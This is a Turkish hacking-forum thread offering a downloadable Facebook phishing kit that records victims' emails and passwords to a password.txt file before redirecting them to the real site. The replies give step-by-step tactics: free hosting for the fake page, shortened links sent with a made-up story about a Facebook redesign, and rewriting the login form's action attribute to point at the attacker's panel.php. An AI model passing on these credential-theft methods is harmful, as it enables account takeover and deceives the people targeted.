Facebook Çalma Scripti

hacker11548

Uzman üye
24 Haz 2015
1,131
24
İstanbul
Hacker11548 DEN FACEBOOK ÇALMA SCRİPTİ

arkadaşlar konuyu başlatıyorum. facebook hacklemeyen kalmasın diye.Şimdi arkadaşlar scriptten birkaç foto atayım. arkadaşlar girilen e posta şifreyi hack klasöründeki password.txt ye kaydediyor. gerçek facebooka yönlendiriyor ama facebook mesaj vermiyor..

7PnvRm.png


kJzvVm.png


NOT:BEN YAPTIM DİYEREK KENDİ YAPMIŞ GİBİ ÜSTLENENE HARAM OLSUN


indirmek için tıklayın

Rar Password: thehacker
virüstotal : tıklayın

WEB SİTE = ARKADAŞLAR BUNU KAPANMAYAN WEB SİTESİNE KOYMAK İSTEYENLER. byet.host tan yapabilirsinz
 
Son düzenleme:

hacker11548

Uzman üye
24 Haz 2015
1,131
24
İstanbul
tabi ki onları da getiririm. ama şu anlık bunu yaptım. merak etme yakında oda gelir. ayrıca kişinin bilgisayardan giriş yap butonuna sağ tık öğeyi denetle deyin. az yukarda action="https://www.facebook.com/login.php?login_attempt=1&lwv=110"
var oraya action="buraya yani" şöyle yaz. script koyduğun site/panel.php

yani senin sitendeki panel.php ye yönlendir.. yine aynı işlem gerçek facede de olur ama o kişinin yanında olması lazm
 
Son düzenleme:

Wep

Kıdemli Üye
28 Ocak 2015
4,412
8
İstanbul
Virustotal yok. Üstelik teşekkür vermek zorunlu değil isteyen verir. (bkz: teşekkür dilenciliği) (bkz: teşekkür etmeyene haram) (bkz: din üzerinden prim yapma)
 

hacker11548

Uzman üye
24 Haz 2015
1,131
24
İstanbul
Size Benden Bikaç taktik
oto yönlendirme yapacan facebook.com girince o siteye girecek. yada o kendi siteni açıcan ve facebook.com yazcan linke ama enter demicen. link kısaltıp faceden çıkarıyor olur. siten.com/mobil.php bunu kısalt telden giren arkine de ki telefondaki uygulama olmamış ama sitede güncellenmiş facebook rengi değişmiş fln fln uydur ver linki telefondaki ile aynı değilmi girince hop sende.. bu kadar basit.. yada gerçek face aç giriş yap butonu sağ tık yap. az yukarda form action var orada form action="burada uzun yazı yazar" oradaki yazıyı sil ve siten.com/panel.php böyle yazarsan eğer gerçek facede giriş yapınca yine o sitendeki o hack klasöründeki password.txt ye kaydeder yine :D
 

XSPEEDX

Uzman üye
22 Haz 2015
1,037
1
TSK
size benden bikaç taktik
oto yönlendirme yapacan facebook.com girince o siteye girecek. Yada o kendi siteni açıcan ve facebook.com yazcan linke ama enter demicen. Link kısaltıp faceden çıkarıyor olur. Siten.com/mobil.php bunu kısalt telden giren arkine de ki telefondaki uygulama olmamış ama sitede güncellenmiş facebook rengi değişmiş fln fln uydur ver linki telefondaki ile aynı değilmi girince hop sende.. Bu kadar basit.. Yada gerçek face aç giriş yap butonu sağ tık yap. Az yukarda form action var orada form action="burada uzun yazı yazar" oradaki yazıyı sil ve siten.com/panel.php böyle yazarsan eğer gerçek facede giriş yapınca yine o sitendeki o hack klasöründeki password.txt ye kaydeder yine :d

: )) aynen öyle..
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.